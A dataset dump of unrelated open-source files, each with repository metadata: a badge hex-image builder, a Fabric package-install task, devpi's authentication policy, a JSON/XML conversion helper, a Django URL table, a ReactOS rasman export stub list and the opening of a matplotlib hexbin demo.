| 2021-01-06T20:39:06.059556 | 2014-08-14T21:34:44 | 2014-08-14T21:34:44 | 99,534,747 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import sys
import os
def main():
    """Build a TI-TXT style hex config image (conf<id>.hex) for one badge.

    Usage: makebackupconf.py <id> <handle> <message>

    The handle may be at most 10 characters and the message at most 16;
    both are NUL-padded to fixed field widths (11 and 18 bytes).  The image
    is 50 0xFF filler bytes, the badge id, the padded handle and message,
    then an 0xFF 0xFF terminator, written as uppercase hex bytes (16 per
    row) at address 0x1900.
    """
    badge_id = int(sys.argv[1])  # renamed from ``id`` (shadowed a builtin)
    handle = sys.argv[2]
    message = sys.argv[3]

    # Validate the fixed-width text fields before building the image.
    if len(handle) > 10:
        print("fail on handle length")
        sys.exit(1)  # was exit(1): sys.exit is the reliable form in scripts
    if len(message) > 16:
        print("fail on message length")
        sys.exit(1)

    # NUL-pad to the field widths the firmware expects.
    handle += '\0' * (11 - len(handle))
    message += '\0' * (18 - len(message))

    chars = [255] * 50                  # leading 0xFF filler block
    chars.append(badge_id)
    chars += [ord(ch) for ch in handle]
    chars += [ord(ch) for ch in message]
    chars += [255, 255]                 # terminator

    # Emit "@1900", then the bytes as 2-digit uppercase hex, 16 per row
    # (space-separated within a row), finishing with the "q" end marker.
    contents = '@1900\n'
    for i, value in enumerate(('%02X' % c for c in chars), 1):
        contents += value
        contents += '\n' if i % 16 == 0 else ' '
    contents += '\nq\n'

    with open('conf%d.hex' % badge_id, 'w') as f:
        f.write(contents)


if __name__ == "__main__":
    main()
|
UTF-8
|
Python
| false | false | 2,014 |
17,789,754,568,607 |
d63a823d8031385baddce3fbb2229113eecbfb09
|
a4435d48131a235d2399b55daf0ea6c10840e102
|
/archlinux/software/scala.py
|
4584efc24efeb39ac10e56b5d867f4772e1169b8
|
[] |
no_license
|
daimatz/fabfile
|
https://github.com/daimatz/fabfile
|
93468f5d72392be4bafb96222dd826d017017bbd
|
01fcf6af3e8104200bd1e8a5ac90fde2382e9660
|
refs/heads/master
| 2021-01-23T06:49:41.322105 | 2014-12-21T18:26:23 | 2014-12-21T18:26:23 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from fabric.api import task, sudo
@task
def scala_sbt():
    """Fabric task: install OpenJDK 7, Scala and sbt via pacman (Arch)."""
    sudo('pacman -Sy --noconfirm jdk7-openjdk scala sbt')
@task
def all():
    '''
    # scala_sbt.all
    scala_sbt()
    '''
    # HACK: the docstring doubles as the task script and is exec'd verbatim,
    # so DO NOT edit it cosmetically -- its text is executable code.  A
    # plain sequence of calls would be clearer.  (Also note this task name
    # shadows the builtin ``all``.)
    exec(all.__doc__.strip())
|
UTF-8
|
Python
| false | false | 2,014 |
17,892,833,771,050 |
1359f3368efe9b439848e7bd2e61f03b75dd7f69
|
ff6c8cd90ed14f4ede5182b71bd6d9e0bd3218c9
|
/server/devpi_server/view_auth.py
|
9739fad76743d82dd16f8b34fce728282f6d6e9e
|
[] |
no_license
|
t-8ch/devpi
|
https://github.com/t-8ch/devpi
|
1f6d44cb6cbc696217a0dc587303baa5fcadfeda
|
1bd9ca757ecd3e4128ca5931b25d57f4313aed9e
|
HEAD
| 2016-09-06T08:28:02.782847 | 2014-08-13T22:03:53 | 2014-08-13T22:03:53 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from devpi_common.types import ensure_unicode
from devpi_server.auth import Auth
from devpi_server.views import abort, abort_authenticate
from pyramid.authentication import CallbackAuthenticationPolicy, b64decode
from pyramid.decorator import reify
from pyramid.security import Allow, Deny, Everyone
import binascii
class RootFactory(object):
    """Pyramid root resource.

    Exposes the matched route pieces (user / index / project name / version)
    as lazily-computed attributes backed by the devpi model, and builds the
    authorization ACL for the request via ``__acl__``.
    """

    def __init__(self, request):
        self.request = request
        self.model = request.registry['xom'].model

    @reify
    def matchdict(self):
        # Copy of the route matchdict with trailing slashes stripped from
        # every value (empty dict when the route has no matchdict).
        if not self.request.matchdict:
            return {}
        return dict(
            (k, v.rstrip('/'))
            for k, v in self.request.matchdict.items())

    def __acl__(self):
        # Build the ACL: 'root' may administer all users and indexes (but
        # the root account itself can never be deleted); the matched user
        # may manage their own account and indexes; principals listed in
        # the stage's acl_upload may upload (':ANONYMOUS:' maps to
        # pyramid's Everyone principal).
        acl = []
        acl.extend([
            (Allow, 'root', 'user_delete'),
            (Allow, 'root', 'user_create'),
            (Allow, 'root', 'user_modify'),
            (Allow, 'root', 'index_create'),
            (Allow, 'root', 'index_modify'),
            (Allow, 'root', 'index_delete'),
            (Allow, 'root', 'del_project')])
        if self.username == 'root':
            # Nobody -- not even root -- may delete the root user.
            acl.append((Deny, Everyone, 'user_delete'))
        if self.username:
            acl.extend([
                (Allow, self.username, 'user_delete'),
                (Allow, self.username, 'user_modify'),
                (Allow, self.username, 'index_create')])
        stage = None
        if self.username and self.index:
            stage = self.model.getstage(self.username, self.index)
        if stage:
            for principal in stage.ixconfig.get("acl_upload", []):
                if principal == ':ANONYMOUS:':
                    principal = Everyone
                acl.append((Allow, principal, 'pypi_submit'))
            acl.extend([
                (Allow, self.username, 'index_modify'),
                (Allow, self.username, 'index_delete'),
                (Allow, self.username, 'del_project')])
        return acl

    def getstage(self, user, index):
        # Resolve a stage through the model, aborting the request with a
        # 404 when it does not exist.
        stage = self.model.getstage(user, index)
        if not stage:
            abort(self.request, 404, "no stage %s/%s" % (user, index))
        return stage

    @reify
    def index(self):
        return self.matchdict.get('index')

    @reify
    def name(self):
        # Project name from the route, normalised to unicode.
        return ensure_unicode(self.matchdict.get('name'))

    @reify
    def version(self):
        return ensure_unicode(self.matchdict.get('version'))

    @reify
    def stage(self):
        # Stage for the matched user/index; 404s via getstage when missing.
        return self.getstage(self.username, self.index)

    @reify
    def user(self):
        # Model user object for the matched username, or 404.
        user = self.model.get_user(self.username)
        if not user:
            abort(self.request, 404, "no user %r" % self.username)
        return user

    @reify
    def username(self):
        return self.matchdict.get('user')
class DevpiAuthenticationPolicy(CallbackAuthenticationPolicy):
    """Pyramid authentication policy for devpi.

    Accepts credentials either from the custom ``X-Devpi-Auth`` header or
    from standard HTTP Basic ``Authorization``, and validates them against
    the devpi auth backend.
    """

    def __init__(self, xom):
        self.realm = "pypi"
        self.auth = Auth(xom.model, xom.config.secret)

    def unauthenticated_userid(self, request):
        """ The userid parsed from the ``Authorization`` request header."""
        credentials = self._get_credentials(request)
        if credentials:
            return credentials[0]

    def remember(self, request, principal, **kw):
        """ A no-op. Devpi authentication does not provide a protocol for
        remembering the user. Credentials are sent on every request.
        """
        return []

    def forget(self, request):
        """ Returns challenge headers. This should be attached to a response
        to indicate that credentials are required."""
        return [('WWW-Authenticate', 'Basic realm="%s"' % self.realm)]

    def callback(self, username, request):
        # Username arg is ignored. Unfortunately _get_credentials winds up
        # getting called twice when authenticated_userid is called. Avoiding
        # that, however, winds up duplicating logic from the superclass.
        credentials = self._get_credentials(request)
        if credentials:
            status, auth_user = self.auth.get_auth_status(credentials)
            request.log.debug("got auth status %r for user %r" % (status, auth_user))
            if status == "ok":
                # Valid credentials; no extra group principals to add.
                return []
            elif status == "nouser":
                abort(request, 404, "user %r does not exist" % auth_user)
            elif status == "expired":
                abort_authenticate(request, msg="auth expired for %r" % auth_user)
            raise ValueError("Unknown authentication status: %s" % status)

    def _get_credentials(self, request):
        # Returns a (username, password) tuple, or None when the request
        # carries no usable credentials.
        authorization = request.headers.get('X-Devpi-Auth')
        if not authorization:
            # support basic authentication for setup.py upload/register
            authorization = request.headers.get('Authorization')
            if not authorization:
                return None
            try:
                authmeth, auth = authorization.split(' ', 1)
            except ValueError: # not enough values to unpack
                return None
            if authmeth.lower() != 'basic':
                return None
        else:
            # X-Devpi-Auth carries the base64 payload directly (no scheme).
            auth = authorization
        try:
            authbytes = b64decode(auth.strip())
        except (TypeError, binascii.Error): # can't decode
            return None

        # try utf-8 first, then latin-1; see discussion in
        # https://github.com/Pylons/pyramid/issues/898
        try:
            auth = authbytes.decode('utf-8')
        except UnicodeDecodeError:
            auth = authbytes.decode('latin-1')

        try:
            username, password = auth.split(':', 1)
        except ValueError: # not enough values to unpack
            return None
        return username, password
|
UTF-8
|
Python
| false | false | 2,014 |
18,691,697,698,852 |
54d940dd43a8318eec0d044bbac62658713ee439
|
90c80cb41f5a865a9b6cf5e905f873c30924a8d1
|
/rest_easy/core/convert.py
|
f117c2ed473970fa600b75b7c5267e277018b283
|
[
"GPL-3.0-only"
] |
non_permissive
|
tom-kerr/rest_easy
|
https://github.com/tom-kerr/rest_easy
|
2d9a81ec939b81a0fdeaaaf0ab05871ef619a10f
|
38bd80fd76ba6d1118af73b614520f62b5914c6c
|
refs/heads/master
| 2022-02-27T05:08:32.307008 | 2014-08-23T17:37:10 | 2014-08-23T17:37:10 | 11,888,331 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Copyright (C) 2013 Tom Kerr
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
import re
import json
import pprint
from copy import copy, deepcopy
from dicttoxml import dicttoxml
import xmltodict
from lxml import etree
class Convert(object):
    """ Handles the conversion of JSON or XML to another format.

    The options for conversion are 'json', 'xml', or 'obj', where 'obj' is a
    DynamicAccessor (see convert.DynamicAccessor)
    """
    def _convert_results_(self, results, output_format,
                          return_format=None, lazy=False, deferred=False):
        """Convert a raw response body to the requested representation.

        ``results`` is the raw response text; ``output_format`` is the
        response's type ('application/json', 'text/xml' or 'javascript');
        ``return_format`` is the desired target ('json', 'xml' or 'obj').
        ``lazy`` and ``deferred`` are forwarded to DynamicAccessor when an
        'obj' is requested.  JavaScript responses are passed through
        unchanged (with a warning when conversion was requested).
        """
        if output_format == 'application/json':
            # NOTE: the ``encoding`` keyword of json.loads() was deprecated
            # and removed in Python 3.9; UTF-8 is the default anyway, so the
            # plain call is equivalent on both Python 2 and 3.
            if not return_format:
                results = json.loads(results)
            elif return_format.lower() == 'xml':
                results = dicttoxml(json.loads(results))
            elif return_format.lower() == 'obj':
                jsonresults = json.loads(results)
                results = DynamicAccessor(jsonresults, lazy, deferred)
        elif output_format == 'text/xml':
            if not return_format:
                return results
            if return_format.lower() == 'json':
                results = json.loads(json.dumps(xmltodict.parse(results)))
            elif return_format.lower() == 'obj':
                jsonresults = json.loads(json.dumps(xmltodict.parse(results)))
                results = DynamicAccessor(jsonresults, lazy, deferred)
        elif output_format == 'javascript':
            if not return_format:
                return results
            if return_format.lower() in ('json', 'xml', 'obj'):
                print ('Cannot Convert \'JavaScript\' response to \'' +
                       return_format.lower() + '\'...returning \'JavaScript\'')
            return results
        # BUG FIX: the json and text/xml conversion branches previously fell
        # off the end of the function and implicitly returned None; return
        # the converted value instead.
        return results
class DynamicAccessor(object):
    """ An object that dynamically builds convenience functions for JSON input.

    To begin, simply pass json to the constructor:

        da = DynamicAccessor(myjson)

    The object returned will have a variety of methods for accessing your
    data and of the following flavors:

    getField -> where 'field' is the key of an item one layer into a
        structure to be returned*, such as:
            {'field': {'deeper_field': value}}

    getFieldBySubField -> where 'field' is the key of a list of dicts which
        can be retrieved based on the value of a 'SubField',
        for example:
            {'items': [ {'id': 1, 'title': ...,
                        {'id': 2, 'title': ...,
                      ]}
        we can retrieve an item by id (getItemsById), or by
        title (getItemsByTitle), or any other subfield.
        All items that match the input for that subfield
        will be returned*.

    aggrField -> where 'field' is a subfield that occurs more than once among
        a list of dicts, and 'aggr' stands for aggregate.
        Considering the previous structure, a method called 'aggrId'
        would return* a list of the values of every 'id' field.

    * If the field being returned contains another nested structure, another
    DynamicAccessor will be generated and returned for further access,
    otherwise, the value of that field or a list of values will be returned.

    One can defer the construction of nested DynamicAccessors by passing
    lazy=True to the parent's constructor, and even defer the parent's
    construction by passing it deferred=True. Construction of these objects
    will take place when one tries to access them.
    """
    def __init__(self, response, lazy=False, deferred=False):
        # lazy: nested DynamicAccessors are themselves built deferred.
        # deferred: postpone building this object's accessors until the
        # first attribute access (see __getattribute__).
        self._lazy_ = lazy
        self._deferred_ = deferred
        self._data_ = response
        if not deferred:
            self._build_accessors_()
        else:
            self._built_ = False

    def __getattribute__(self, name):
        """Build the accessors on first touch when construction was deferred."""
        # object.__getattribute__ is used directly to avoid recursing back
        # into this hook while checking the construction flags.
        if object.__getattribute__(self, '_deferred_') and \
           not object.__getattribute__(self, '_built_'):
            object.__getattribute__(self, '_build_accessors_')()
        return object.__getattribute__(self, name)

    def _build_accessors_(self):
        """Walk self._data_ and attach get* / aggr* / get*By* methods."""
        self._built_ = True
        _data = self._data_
        # parent=True (dict input) also hangs accessors for one level of
        # child fields off this object (see _add_child_get_func_).
        if isinstance(self._data_, list):
            parent = False
        elif isinstance(self._data_, dict):
            parent = True
        # hasgetby: top-level get...By... matchers were already added for a
        # multi-element list; otherwise they may be added per-field below.
        if not isinstance(self._data_, list):
            hasgetby=False
            _data = [_data, ]
        elif isinstance(self._data_, list) and len(self._data_)==1:
            hasgetby=False
        else:
            hasgetby=True
            self._add_getby_func_('', _data)
        for d in _data:
            if isinstance(d, dict):
                for item in d.items():
                    attr, data = item
                    if not hasgetby and isinstance(data, list):
                        # Lists of multi-key dicts get By-matchers too.
                        if len(data) == 1 and isinstance(data[0], dict):
                            if len(data[0].keys()) > 1:
                                self._add_getby_func_(attr, data)
                        elif len(data) > 1:
                            nondicts = [i for i in data if not isinstance(i, dict)]
                            if not nondicts:
                                self._add_getby_func_(attr, data)
                    self._add_get_func_(attr, data, parent)
            else:
                # Only dicts (or lists of dicts) are supported at this level.
                raise NotImplementedError()

    def _add_get_func_(self, attr, data, parent):
        """Attach a get<Attr> (or aggr<Attrs>) closure returning *data*."""
        def function(raw=False):
            # raw=True returns the underlying structure unformatted.
            fdata = function._data_
            if raw:
                return fdata
            return self._get_formatted_data_(fdata)
        attr = self._format_attr_name_(attr)
        plural_attr = self._make_plural_(attr)
        if hasattr(self, 'get'+attr) or hasattr(self, 'aggr'+plural_attr):
            # Second occurrence of the same field: merge into an aggregate.
            self._append_get_func_(attr, data)
        else:
            if parent:
                self._add_child_get_func_(data)
            # The closure carries its data on the function object itself so
            # _append_get_func_ can mutate it later.
            function._data_ = data
            if isinstance(self._data_, list):
                setattr(self, 'aggr'+plural_attr, function)
            else:
                setattr(self, 'get'+attr, function)

    def _get_formatted_data_(self, data):
        """Format *data* for return: unwrap, or wrap in a DynamicAccessor."""
        if isinstance(data, list):
            return self._format_list_(data)
        elif isinstance(data, dict):
            return self._format_dict_(data)
        else:
            return data

    def _format_list_(self, lst):
        """Format each element of *lst*; nested structures become accessors."""
        l = []
        if not self._is_flat_(lst):
            for item in lst:
                if self._lazy_:
                    deferred = True
                else:
                    deferred = False
                l.append(DynamicAccessor(item, lazy=self._lazy_,
                                         deferred=deferred))
        else:
            for item in lst:
                if isinstance(item, dict):
                    l.append(self._format_dict_(item))
                else:
                    l.append(item)
        return l

    def _format_dict_(self, dct):
        """Unwrap a single-key dict to its value, else wrap in an accessor."""
        if len(dct.keys()) == 1:
            for v in dct.values():
                return v
        else:
            if self._lazy_:
                deferred = True
            else:
                deferred = False
            return DynamicAccessor(dct, lazy=self._lazy_,
                                   deferred=deferred)

    def _add_child_get_func_(self, data):
        """Also expose one level of child fields as get*/aggr* methods."""
        if isinstance(data, list):
            for i in data:
                if isinstance(i, dict):
                    for a,d in i.items():
                        self._add_get_func_(a,d, parent=False)
        elif isinstance(data, dict):
            for a,d in data.items():
                self._add_get_func_(a,d, parent=False)

    def _append_get_func_(self, attr, data):
        """Merge *data* into an existing accessor for a repeated field."""
        try:
            instance = getattr(self, 'get'+attr)
            nattr = attr
        except AttributeError:
            nattr = self._make_plural_(attr)
            instance = getattr(self, 'aggr'+nattr)
        if not isinstance(instance._data_, list):
            instance._data_ = [instance._data_, ]
        if isinstance(data, list) and len (data) == 1:
            data = data[0]
        if not isinstance(data, dict):
            instance._data_.append(data)
        else:
            # Merge dict data key-by-key with what the accessor already holds.
            newdata = {}
            for k,v in data.items():
                for item in instance._data_:
                    if not item:
                        continue
                    if k not in item:
                        if not k in newdata:
                            newdata[k] = [v,]
                        else:
                            newdata[k].append(v)
                    elif k in item:
                        if not k in newdata:
                            newdata[k] = []
                        if not isinstance(item[k], list):
                            item[k] = [item[k], ]
                        for i in item[k]:
                            newdata[k].append(i)
                        if isinstance(v, list) and len(v) == 1:
                            newdata[k].append(v[0])
                        else:
                            newdata[k].append(v)
            if newdata:
                instance._data_ = newdata
        if hasattr(self, 'get'+attr):
            # Promote a singular get<Attr> to a plural aggr<Attrs>.
            newinstance = deepcopy(instance)
            delattr(self, 'get'+attr)
            plural_attr = self._make_plural_(attr)
            setattr(self, 'aggr'+plural_attr, newinstance)

    def _add_getby_func_(self, attr, data):
        """Attach get<Attr>By<SubField> matchers for every subfield seen."""
        for item in data:
            for chattr, chdata in item.items():
                function = self._get_match_func_(chattr, data)
                parent = self._format_attr_name_(attr)
                child = self._format_attr_name_(chattr)
                setattr(self, 'get'+parent+'By'+child, deepcopy(function))

    def _get_match_func_(self, attr, data):
        """Return a closure that collects items of *data* matching a value."""
        def function(value, raw=False):
            matches = []
            for item in data:
                if attr not in item:
                    continue
                if isinstance(item[attr], (str, int, float, bool)):
                    if self._match_str_(item[attr], value):
                        matches.append(item)
                elif isinstance(item[attr], list):
                    if self._match_list_(item[attr], value):
                        matches.append(item)
                    else:
                        for i in item[attr]:
                            if isinstance(i, dict):
                                if self._match_dict_(i, value):
                                    matches.append(item)
                elif isinstance(item[attr], dict):
                    if self._match_dict_(item[attr], value):
                        matches.append(item)
            if raw:
                return matches
            else:
                if self._lazy_:
                    deferred = True
                else:
                    deferred = False
                return DynamicAccessor(matches, lazy=self._lazy_,
                                       deferred=deferred)
        return function

    def _match_str_(self, string, value):
        """True if the scalar field equals *value*."""
        if string == value:
            return True
        else:
            return False

    def _match_list_(self, lst, value):
        """True if *value* occurs in the list field."""
        if value in lst:
            return True
        else:
            return False

    def _match_dict_(self, dct, value):
        """Match a dict field either by {key: value} pairs or a bare value."""
        if isinstance(value, dict):
            for k,v in value.items():
                if k in dct:
                    if v == dct[k] or \
                       isinstance(dct[k], list) and v in dct[k]:
                        return True
        else:
            # A bare value is only unambiguous against a single-field dict.
            if len(dct.keys()) != 1:
                raise LookupError('Too many fields; cannot disambiguate.')
            for v in dct.values():
                if value == v or \
                   isinstance(v, list) and value in v:
                    return True
        return False

    def _format_attr_name_(self, attr):
        """CamelCase a raw key so it can be embedded in a method name."""
        # Capitalize the first alphabetic character.
        for num, i in enumerate(attr):
            if re.match('[a-zA-Z]', i):
                attr = attr[:num] + attr[num].upper() + attr[num+1:]
                break
        # Convert snake_case segments to CamelCase, preserving leading '_'.
        seg = attr.split('_')
        if len(seg) > 1:
            attr = ''
            for s in seg:
                if s == '':
                    attr += '_'
                else:
                    attr += s[0].upper() + s[1:]
        # Replace characters that are invalid in Python identifiers.
        attr = attr.replace('@', 'Arobase')
        attr = attr.replace('#', 'Hash')
        return attr

    def _make_plural_(self, attr):
        """Naive English pluralization used for aggr* method names."""
        if not attr.endswith('s'):
            if attr.endswith('y') and \
               attr[-2] not in ('a','e','i','o','u'):
                attr = attr[:-1] + 'ies'
            else:
                attr += 's'
        elif attr.endswith('ss'):
            attr += 'es'
        return attr

    def _is_flat_(self, data):
        """True if *data* contains no nested dicts/lists (recursing lists)."""
        if isinstance(data, list):
            for item in data:
                if isinstance(item, (dict, list)):
                    if not self._is_flat_(item):
                        return False
            return True
        elif isinstance(data, dict):
            for k,v in data.items():
                if isinstance(v, (dict, list)):
                    return False
            return True
|
UTF-8
|
Python
| false | false | 2,014 |
7,559,142,443,535 |
8689581c7fef4d6848d33bcf8054ad5aa2aa042f
|
f876cb962f090937205dfa60750b19305fa53c42
|
/test/com/zhyfoundry/spider/SpiderTest.py
|
f1ed6935f3c384de5a4b171090340396d04d8c9e
|
[
"LGPL-2.1-or-later",
"GPL-1.0-or-later",
"GPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-2.0-only"
] |
non_permissive
|
atealxt/web-crawler
|
https://github.com/atealxt/web-crawler
|
a0dd38d30c3010dfe0aca8344a0ae4d1760eeef7
|
ea98f60befbf0fc9993e1a257e2421dcab76b42f
|
refs/heads/master
| 2021-01-23T07:20:50.440992 | 2013-07-16T06:16:10 | 2013-07-16T06:16:10 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import unittest
from com.zhyfoundry.spider import Spider
class SpiderTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testCrawl(self):
c = Spider.Spider()
c.crawl()
pass
if __name__ == "__main__":
    #import sys;sys.argv = ['', 'Test.testName']
    # Run all tests in this module through the unittest CLI runner.
    unittest.main()
|
UTF-8
|
Python
| false | false | 2,013 |
12,764,642,813,345 |
b40f0ca5c35ac68f497166c839563478e10a83df
|
f03d5e1e89724d1537b241c780a45eab342b6b67
|
/depot/scripts/urls.py
|
d85aa80bb6b5cb0db076ec25c8ac0b0ba709d5fd
|
[] |
no_license
|
doubleshow/sikulidepot
|
https://github.com/doubleshow/sikulidepot
|
c63e1bff46cdf2cde607b6039f28ca3fb25ce6dd
|
16e8d61e0fd2000c7c3df2f8359e036f9831641d
|
refs/heads/master
| 2021-01-15T14:28:35.441851 | 2011-01-08T13:56:05 | 2011-01-08T13:56:05 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.conf.urls.defaults import *
# URL routing table for the scripts app; all view names below resolve
# against the 'scripts.views' prefix passed as the first argument.
urlpatterns = patterns('scripts.views',
    # Example:
    # (r'^sikulirepo/', include('sikulirepo.foo.urls')),
    # Uncomment the admin/doc line below to enable admin documentation:
    # (r'^admin/doc/', include('django.contrib.admindocs.urls')),
    # Uncomment the next line to enable the admin:
    # (r'^admin/', include(admin.site.urls)),
    (r'^$', 'index'),                                     # script listing
    (r'^(?P<script_id>\d+)/$', 'detail'),                 # script detail page
    (r'^(?P<script_id>\d+)/update/$', 'update'),          # edit a script
    (r'^(?P<script_id>\d+)/showsource/$', 'showsource'),  # raw source view
    (r'^upload_file/$', 'upload_file'),                   # upload endpoint
)
|
UTF-8
|
Python
| false | false | 2,011 |
15,006,615,769,191 |
2afc1a9e58cfb63ae2439a3600f392a7f8f6685d
|
ba41f812870e22b71957dbf3c90cf83a41d250fc
|
/reactos/dll/win32/rasman/rasman.spec
|
32774c7a8a243c3331610973bf1b234769e92c72
|
[
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.1-only",
"BSD-2-Clause",
"LGPL-3.0-only",
"GPL-3.0-only"
] |
non_permissive
|
hoangduit/reactos
|
https://github.com/hoangduit/reactos
|
2826b98902401bcdcee625ccf435f8db639f6c4f
|
63682957b86d77c7d82e7b887797ef82ea92d271
|
refs/heads/master
| 2021-01-23T03:28:31.646642 | 2014-12-29T21:35:51 | 2014-12-29T21:35:51 | 39,994,765 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
@ stub DwRasGetHostByName
@ stub IsRasmanProcess
@ stub RasActivateRoute
@ stub RasActivateRouteEx
@ stub RasAddConnectionPort
@ stub RasAddNotification
@ stub RasAllocateRoute
@ stub RasBundleClearStatistics
@ stub RasBundleClearStatisticsEx
@ stub RasBundleGetPort
@ stub RasBundleGetStatistics
@ stub RasBundleGetStatisticsEx
@ stub RasCompressionGetInfo
@ stub RasCompressionSetInfo
@ stub RasConnectionEnum
@ stub RasConnectionGetStatistics
@ stub RasCreateConnection
@ stub RasDeAllocateRoute
@ stub RasDestroyConnection
@ stub RasDeviceConnect
@ stub RasDeviceEnum
@ stub RasDeviceGetInfo
@ stub RasDeviceSetInfo
@ stub RasDoIke
@ stub RasEnableIpSec
@ stub RasEnableRasAudio
@ stub RasEnumConnectionPorts
@ stub RasEnumLanNets
@ stub RasFindPrerequisiteEntry
@ stub RasFreeBuffer
@ stub RasGetBandwidthUtilization
@ stub RasGetBuffer
@ stub RasGetCalledIdInfo
@ stub RasGetConnectInfo
@ stub RasGetConnectionParams
@ stub RasGetConnectionUserData
@ stub RasGetCustomScriptDll
@ stub RasGetDevConfig
@ stub RasGetDevConfigEx
@ stub RasGetDeviceConfigInfo
@ stub RasGetDeviceName
@ stub RasGetDeviceNameW
@ stub RasGetDialParams
@ stub RasGetEapUserInfo
@ stub RasGetFramingCapabilities
@ stub RasGetHConnFromEntry
@ stub RasGetHportFromConnection
@ stub RasGetInfo
@ stub RasGetInfoEx
@ stub RasGetKey
@ stub RasGetNdiswanDriverCaps
@ stub RasGetNumPortOpen
@ stub RasGetPortUserData
@ stub RasGetProtocolInfo
@ stub RasGetTimeSinceLastActivity
@ stub RasGetUnicodeDeviceName
@ stub RasGetUserCredentials
@ stub RasInitialize
@ stub RasInitializeNoWait
@ stub RasIsIpSecEnabled
@ stub RasIsTrustedCustomDll
@ stub RasLinkGetStatistics
@ stub RasPnPControl
@ stub RasPortBundle
@ stub RasPortCancelReceive
@ stub RasPortClearStatistics
@ stub RasPortClose
@ stub RasPortConnectComplete
@ stub RasPortDisconnect
@ stub RasPortEnum
@ stub RasPortEnumProtocols
@ stub RasPortFree
@ stub RasPortGetBundle
@ stub RasPortGetBundledPort
@ stub RasPortGetFramingEx
@ stub RasPortGetInfo
@ stub RasPortGetProtocolCompression
@ stub RasPortGetStatistics
@ stub RasPortGetStatisticsEx
@ stub RasPortListen
@ stub RasPortOpen
@ stub RasPortOpenEx
@ stub RasPortReceive
@ stub RasPortReceiveEx
@ stub RasPortRegisterSlip
@ stub RasPortReserve
@ stub RasPortRetrieveUserData
@ stub RasPortSend
@ stub RasPortSetFraming
@ stub RasPortSetFramingEx
@ stub RasPortSetInfo
@ stub RasPortSetProtocolCompression
@ stub RasPortStoreUserData
@ stub RasPppCallback
@ stub RasPppChangePassword
@ stub RasPppGetEapInfo
@ stub RasPppGetInfo
@ stub RasPppRetry
@ stub RasPppSetEapInfo
@ stub RasPppStart
@ stub RasPppStarted
@ stub RasPppStop
@ stub RasProtocolEnum
@ stub RasRPCBind
@ stub RasRefConnection
@ stub RasReferenceCustomCount
@ stub RasReferenceRasman
@ stub RasRefreshKerbCreds
@ stub RasRegisterPnPEvent
@ stub RasRegisterPnPHandler
@ stub RasRegisterRedialCallback
@ stub RasRequestNotification
@ stub RasRpcConnect
@ stub RasRpcConnectServer
@ stub RasRpcDeleteEntry
@ stub RasRpcDeviceEnum
@ stub RasRpcDisconnect
@ stub RasRpcDisconnectServer
@ stub RasRpcEnumConnections
@ stub RasRpcGetCountryInfo
@ stub RasRpcGetDevConfig
@ stub RasRpcGetErrorString
@ stub RasRpcGetInstalledProtocols
@ stub RasRpcGetInstalledProtocolsEx
@ stub RasRpcGetSystemDirectory
@ stub RasRpcGetUserPreferences
@ stub RasRpcGetVersion
@ stub RasRpcPortEnum
@ stub RasRpcPortGetInfo
@ stub RasRpcRemoteGetSystemDirectory
@ stub RasRpcRemoteGetUserPreferences
@ stub RasRpcRemoteRasDeleteEntry
@ stub RasRpcRemoteSetUserPreferences
@ stub RasRpcSetUserPreferences
@ stub RasRpcUnloadDll
@ stdcall RasSecurityDialogBegin(ptr ptr long ptr long ptr)
@ stdcall RasSecurityDialogComplete(ptr)
@ stdcall RasSecurityDialogGetInfo(ptr ptr)
@ stdcall RasSecurityDialogReceive(ptr ptr ptr long ptr)
@ stdcall RasSecurityDialogSend(ptr ptr long)
@ stub RasSendCreds
@ stub RasSendNotification
@ stub RasSendPppMessageToRasman
@ stub RasServerPortClose
@ stub RasSetAddressDisable
@ stub RasSetBapPolicy
@ stub RasSetCachedCredentials
@ stub RasSetCalledIdInfo
@ stub RasSetCommSettings
@ stub RasSetConnectionParams
@ stub RasSetConnectionUserData
@ stub RasSetDevConfig
@ stub RasSetDeviceConfigInfo
@ stub RasSetDialParams
@ stub RasSetEapLogonInfo
@ stub RasSetEapUserInfo
@ stub RasSetIoCompletionPort
@ stub RasSetKey
@ stub RasSetPortUserData
@ stub RasSetRasdialInfo
@ stub RasSetRouterUsage
@ stub RasSignalNewConnection
@ stub RasStartRasAutoIfRequired
@ stub RasmanUninitialize
|
UTF-8
|
Python
| false | false | 2,014 |
3,891,240,413,029 |
d79fb047a7c7996c27ae20c6c5410a7d8c985944
|
9e567b8241ce00e9d53843f5aba11c4a119b079f
|
/tags/v0_98_2/examples/pylab_examples/hexbin_demo.py
|
9e325ddeb5564c595fe531712767a7ceb42cc5d3
|
[
"LicenseRef-scancode-unknown-license-reference"
] |
non_permissive
|
neilpanchal/matplotlib
|
https://github.com/neilpanchal/matplotlib
|
3d2a7133e858c4eefbb6c2939eb3f7a328b18118
|
7565d1f2943e0e7b4a3f11ce692dfb9b548d0b83
|
refs/heads/master
| 2020-06-11T09:20:43.941323 | 2011-01-21T21:50:16 | 2011-01-21T21:50:16 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
hexbin is an axes method or pyplot function that is essentially
a pcolor of a 2-D histogram with hexagonal cells. It can be
much more informative than a scatter plot; in the first subplot
below, try substituting 'scatter' for 'hexbin'.
'''
from matplotlib.pyplot import *
import numpy as np

# Correlated 2-D sample: y is a noisy linear function of x.
n = 100000
x = np.random.standard_normal(n)
y = 2.0 + 3.0 * x + 4.0 * np.random.standard_normal(n)
# Shared data limits so both subplots show identical axes.
